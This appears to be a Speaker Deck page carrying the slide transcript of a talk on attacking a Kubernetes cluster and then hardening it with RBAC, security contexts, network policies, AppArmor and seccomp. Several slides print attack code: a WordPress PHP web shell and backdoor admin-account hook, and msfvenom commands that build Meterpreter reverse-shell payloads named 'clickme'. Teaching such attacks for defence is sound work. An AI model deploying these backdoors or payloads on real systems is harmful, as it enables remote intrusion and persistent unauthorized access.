Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking a K8s cluster and how defending it

Johann du Toit
October 31, 2019
Technology
0
56

Attacking a K8s cluster and how defending it

Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.

Johann du Toit

October 31, 2019
Tweet

More Decks by Johann du Toit

See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
54
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
74
Progressive Web Apps in 15 Minutes
johanndutoit
0
36
The Machine Learning Intervention
johanndutoit
0
61
Progressive Web Apps
johanndutoit
0
90
Progressive Web Apps
johanndutoit
0
92
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
110
Google Design Sprints
johanndutoit
0
81
Cloud Messaging
johanndutoit
0
170

Other Decks in Technology

See All in Technology
DMARC 対応の話 - MIXI CTO オフィスアワー #04
bbqallstars
1
150
AWS Media Services 最新サービスアップデート 2024
eijikominami
0
140
いざ、BSC討伐の旅
nikinusu
2
750
CysharpのOSS群から見るModern C#の現在地
neuecc
0
770
利きプロセススケジューラ
sat
PRO
5
2.7k
ノーコードデータ分析ツールで体験する時系列データ分析超入門
negi111111
0
360
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
3.8k
安心してください、日本語使えますよ―Ubuntu日本語Remix提供休止に寄せて― 2024-11-17
nobutomurata
0
320
テストコード品質を高めるためにMutation Testingライブラリ・Strykerを実戦導入してみた話
ysknsid25
6
2.4k
[OCI Technical Deep Dive] Oracle Cloud VMware Solution が開くVMware仮想環境モダナイゼーションへの道(2024年10月29日開催)
oracle4engineer
PRO
0
110
BLADE: An Attempt to Automate Penetration Testing Using Autonomous AI Agents
bbrbbq
0
200
ドメイン名の終活について - JPAAWG 7th -
mikit
32
19k

Featured

See All Featured
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.1k
Code Reviewing Like a Champion
maltzj
520
39k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
109
49k
We Have a Design System, Now What?
morganepeng
50
7.2k
What's in a price? How to price your products and services
michaelherold
243
12k
Docker and Python
trallard
40
3.1k
Raft: Consensus for Rubyists
vanstee
136
6.6k
[RailsConf 2023] Rails as a piece of cake
palkan
51
4.9k
Rails Girls Zürich Keynote
gr2m
94
13k
The World Runs on Bad Software
bkeepers
PRO
65
11k

Transcript

  1. Bust a Kube: Let’s attack a Kubernetes cluster and secure

    it along the way
  2. None
  3. None
  4. None
  5. None
  6. None
  7. None

  8. WHAT ATTACKING DEFENDING

  9. None

  10. WHAT ATTACKING OMG HELP

  11. None
  12. None
  13. None

  14. PODS NODES SERVICES NAMESPACES

  15. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume

  16. Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim

    e pod #1 pod #2 pod #3

  17. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic

  18. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web

  19. Namespaces Logical grouping of resources and the first hint of

    multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
  20. None

  21. > kubectl apply -f app.yaml

  22. None

  23. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  24. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
  25. None
  26. None

  27. <?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo

    shell_exec($_REQUEST[“c”]);’ ); } ?>
  28. None
  29. None

  30. <?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')

    { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>

  31. “Head over to your site and try the function. It’s

    fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
  32. None
  33. None
  34. None
  35. None
  36. None
  37. None
  38. None

  39. Kali Linux

  40. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f sh \ -o clickme.sh

  41. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f elf \ -o clickme

  42. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f exe \ -o clickme.exe

  43. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f macho \ -o clickme.macho
  44. None
  45. None
  46. None
  47. None

  48. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  49. CONTROL PLANE NETWORKING HOST RUNTIME

  50. CONTROL PLANE NETWORKING HOST RUNTIME

  51. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  52. None
  53. None
  54. None
  55. None
  56. None
  57. None

  58. UPGRADE!

  59. None

  60. Role Based Access Control

  61. “RBAC”

  62. None

  63. Role: MarketingAdmin Role: Developer

  64. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer

  65. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding

  66. CONTROL PLANE NETWORKING HOST RUNTIME

  67. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 Step 1: Run as Non Root

  68. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem

  69. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping

  70. CONTROL PLANE NETWORKING HOST RUNTIME

  71. apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:

    tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
  72. None
  73. None
  74. None

  75. CONTROL PLANE NETWORKING HOST RUNTIME

  76. None
  77. None

  78. Minimal Host OS

  79. None

  80. AppArmor

  81. seccomp

  82. Questions?

  83. • CIS Benchmark - CIS Security • Kube-bench - Aqua

    Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec

  84. Security is a not a noun you refer to every

    now and then, it’s a verb and involves constant and specific action

  85. Thanks! [email protected] @signedness